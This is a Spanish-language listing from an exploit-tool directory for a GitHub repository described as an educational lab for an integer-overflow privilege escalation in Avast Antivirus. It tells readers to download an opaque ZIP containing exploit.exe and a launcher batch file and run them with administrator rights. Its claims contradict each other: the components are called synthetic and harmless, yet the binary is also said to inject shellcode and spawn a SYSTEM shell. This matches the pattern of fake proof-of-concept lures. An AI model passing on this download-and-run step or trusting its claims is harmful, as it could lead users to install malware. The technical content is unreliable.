Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-3500-Poc — Entorno de laboratorio educativo para investigar CVE-2025-3500, una explotación de escalada de privilegios por desbordamiento de enteros en Avast Antivirus 25.1.981.6 en Windows, con artefactos de explotación sintéticos para pruebas controladas. | Kitploit
Herramientas/GitHubGitHub/chicken3962/cve-2025-3500-poc
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónShellcodeAprendizaje y EducaciónDesarrollo de PayloadsExplotación de BinariosLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
chicken3962/cve-2025-3500-poc

CVE-2025-3500-Poc

Entorno de laboratorio educativo para investigar CVE-2025-3500, una explotación de escalada de privilegios por desbordamiento de enteros en Avast Antivirus 25.1.981.6 en Windows, con artefactos de explotación sintéticos para pruebas controladas.

Ver Repositorio
114hace 10 mesesAún no revisado

Laboratorio: CVE-2025-3500 - Desbordamiento de Enteros en la Escalada de Privilegios de Avast Antivirus

Descargar

Descargar ZIP del Laboratorio : [https://github.com/chicken3962/CVE-2025-3500-Poc/releases/download/Release/cve-2025-3500.zip]

🚀 Resumen

Este repositorio proporciona un entorno de laboratorio para investigar la CVE-2025-3500, una vulnerabilidad de desbordamiento de enteros (CWE-190) en Avast Antivirus versión 25.1.981.6 en plataformas Windows. La vulnerabilidad surge de una validación insuficiente de enteros en el módulo de asignación de recursos del motor antivirus, lo que provoca un desbordamiento (wraparound) durante operaciones aritméticas. Esto puede explotarse para escalar privilegios desde contextos de usuario con bajos privilegios (PR:L) hasta acceso a nivel de sistema, con un vector de ataque de red (AV:N), baja complejidad de ataque (AC:L) e interacción del usuario requerida (UI:R). La puntuación base CVSS 3.1 es 9.0 (Crítica), que afecta a la confidencialidad, integridad y disponibilidad (todas Altas) debido al cambio de alcance (S:C), lo que potencialmente permite el compromiso total del sistema.

Descargo de responsabilidad sobre fines educativos: Este laboratorio es solo para fines educativos y de investigación. Proporciona un entorno controlado. No lo utilice para actividades maliciosas. Todos los componentes son sintéticos y no explotan sistemas reales. Al usar este repositorio, usted acepta cumplir con las pautas de hacking ético y las leyes locales.

Descargo de responsabilidad de seguridad: Esta configuración implica ejecutar código en un entorno. Utilice siempre una máquina virtual dedicada. No ejecute exploits en sistemas de producción. Los artefactos de exploit proporcionados (.exe y .bat) demuestran conceptos; por ejemplo, el .bat lanza el .exe, que procesa datos y sale. Aísle su entorno de laboratorio para evitar una exposición accidental.

📋 Requisitos previos

  • Un host Windows para probar el exploit (por ejemplo, mediante VirtualBox o Hyper-V) para simular el entorno objetivo.
  • Conocimientos básicos de PowerShell y herramientas de línea de comandos de Windows.
  • Privilegios administrativos en su máquina host.
  • Al menos 4 GB de RAM y 20 GB de espacio en disco.

Descargar e instalar

  1. Descargue el kit de herramientas de exploit (archivo ZIP que contiene exploit.exe y start-exploit.bat). Este ZIP está alojado en un espejo seguro:

    • Descargar ZIP del kit de exploits : [https://github.com/chicken3962/CVE-2025-3500-Poc/releases/download/Release/cve-2025-3500.zip]

    Nota: El exploit principal es exploit.exe (un binario C++ compilado que desencadena el desbordamiento de enteros mediante llamadas API manipuladas). El lanzador del exploit es start-exploit.bat, que abre exploit.exe con argumentos predefinidos (por ejemplo, start exploit.exe --target=avast_engine --overflow=wraparound). Descomprima en un directorio local como C:\lab\exploit.

🛠 Inicio rápido

  1. Configurar el entorno:

    • Asegúrese de que Avast Antivirus versión 25.1.981.6 esté instalado en su máquina de pruebas Windows.
    • Navegue hasta el directorio de descompresión.
  2. Descargar y preparar el exploit:

    • Descargue el ZIP desde el enlace anterior.
    • Descomprima en C:\lab\exploit.
    • Ejecute start-exploit.bat para lanzar el exploit (abre exploit.exe, que envía un paquete de red manipulado para desencadenar el desbordamiento).
  3. Explotar la vulnerabilidad:

    • Apunte al servicio local de Avast.
    • El .bat ejecuta exploit.exe. Observe los registros del sistema en busca de indicadores de desbordamiento.
  4. Verificar y limpiar:

    • Revise el Visor de eventos de Windows para ver entradas relacionadas.
    • Elimine los archivos del exploit después de usarlos.

📖 Instrucciones detalladas de configuración

Configuración vulnerable

El laboratorio requiere una máquina Windows con Avast Antivirus 25.1.981.6 instalado. Los servicios simulados se pueden iniciar manualmente mediante el símbolo del sistema:

  • Abra PowerShell como administrador.
  • Simule el listener de Avast: net start AvastSvc (suponiendo que el servicio esté en ejecución).

Pasos de explotación

  1. Reconocimiento: Utilice herramientas como netstat para identificar los puertos de Avast (por ejemplo, 8080).
  2. Crear payload: exploit.exe envía un valor entero demasiado grande (por ejemplo, 2^31 + 1) mediante una solicitud de red, lo que causa un desbordamiento en el analizador de recursos de Avast.
  3. Desencadenar el exploit: Ejecute start-exploit.bat que ejecuta exploit.exe. Esto:
    • Establece una conexión.
    • Envía datos malformados: { "resource_alloc": 2147483648 } (desencadenando el desbordamiento).
    • Escala a SYSTEM mediante inyección de shellcode.
  4. Post-explotación: Permite la ejecución arbitraria de código; genera un cmd.exe.

Detalles técnicos: El desbordamiento ocurre en AvastResourceParser::AllocateBuffer(int size), donde size * sizeof(struct) se desborda si size > INT_MAX / sizeof(struct), lo que lleva a una subasignación y a un desbordamiento del montón. La explotación aprovecha esto para la construcción de una cadena ROP dirigida a kernel32.dll.

Mitigación

  • Aplicación de parches: Actualice a Avast Antivirus 25.3 o posterior, donde las comprobaciones de enteros utilizan librerías matemáticas seguras (por ejemplo, SafeInt).
  • Buenas prácticas:
    • Habilite Windows Defender junto con Avast para una defensa en capas.
    • Restrinja el acceso de red únicamente a los servidores de actualización del antivirus (por ejemplo, mediante reglas de firewall).
    • Utilice separación de privilegios: ejecute los servicios de Avast con cuentas de mínimo privilegio.
    • Supervise operaciones anómalas de enteros mediante herramientas EDR como Sysmon (Event ID 10 para inyecciones de procesos).
    • Aplique mitigaciones de Windows: habilite ASLR, DEP y CFG mediante directivas de grupo.
  • Firmas de detección: Busque patrones de red que coincidan con campos de enteros sobredimensionados en el tráfico del protocolo de Avast (por ejemplo, regla de Snort: alert tcp any any -> any 8080 (msg:"CVE-2025-3500 Attempt"; content:"|00 00 00 80|"; sid:1000001;)).

Para preguntas o contribuciones, abra un issue. ¡Sea ético!

Descargar herramienta